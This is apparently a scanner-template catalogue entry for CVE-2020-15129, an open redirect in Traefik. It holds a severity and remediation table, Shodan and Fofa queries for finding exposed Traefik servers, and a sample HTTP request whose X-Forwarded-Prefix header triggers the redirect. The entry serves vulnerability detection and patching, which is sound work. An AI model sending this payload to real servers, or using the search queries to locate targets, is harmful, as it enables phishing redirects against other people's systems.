| Title | Traefik - Open Redirect |
|---|---|
| Author | dwisiswant0 |
| Severity | Medium |
| Impact | An attacker can manipulate the redirect URL and trick users into visiting malicious websites. |
| Remediation | Apply the vendor-provided patch or upgrade to a non-vulnerable version of Traefik. |
| CVSS Score | 4.7 |
| EPSS Score | 0.76842 |
| CVE ID | CVE-2020-15129 |
| CWE ID | CWE-601 |
| Shodan Query | http.title:"traefik" |
| Fofa Query | title="traefik" |
| Tags | cve cve2020 traefik redirect vuln |
Traefik before 1.7.26, 2.2.8, and 2.3.0-rc3 contains an open redirect vulnerability in the X-Forwarded-Prefix header. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
Connection: close
Accept: */*
Accept-Language: en
X-Forwarded-Prefix: https://foo.nl
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-15129.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-15129.pcap
N/AN/A